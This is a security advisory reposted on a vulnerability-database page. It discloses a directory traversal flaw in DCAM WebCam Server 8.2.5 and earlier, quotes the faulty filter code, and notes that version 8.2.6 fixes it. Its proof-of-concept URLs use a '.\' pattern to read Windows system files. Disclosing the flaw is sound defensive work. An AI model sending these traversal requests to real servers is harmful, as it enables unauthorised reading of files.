Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

dcamwebcam.txt

🗓️ 23 Dec 2003 00:00:00Reported by Luigi AuriemmaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Directory traversal vulnerability in DCAM WebCam server allows remote exploitation on Windows systems.

Code
`#######################################################################  
  
Luigi Auriemma  
  
Application: DCAM WebCam server  
http://www.hyperionx.com  
http://sourceforge.net/projects/dcamserver/  
Versions: <= 8.2.5  
Platforms: Windows  
Bug: Directory traversal bug  
Risk: high  
Exploitation: remote with browser  
Date: 22 Dec 2003  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: http://aluigi.altervista.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
DCAM WebCam Server is an OpenSource program written in VisualBasic that  
allows to capture live streaming video and to broadcast it on the web  
through the built-in webserver.  
  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
The webserver built into DCAM uses a protection to avoid the directory  
traversal bug.  
We can see it in Form1.frm:  
  
...  
880 page = Replace(page, "..", "")  
881 page = Replace(page, "./", "")  
882 page = Replace(page, "/.", "")  
883 page = Replace(page, "//", "")  
884 page = Replace(page, "\", "")  
...  
  
The problem happens when the attacker uses the pattern ".\" that  
deceives the checks and allows him to see and download any file in the  
remote system knowing the path.  
  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://server/.\.\.\.\/windows/system.ini  
http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini  
  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
Version 8.2.6  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.altervista.org  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Dec 2003 00:00Current
7.4High risk
Vulners AI Score7.4
dcam webcam serverdirectory traversal bugremote exploitationhigh riskversion 8.2.6windows platform.
20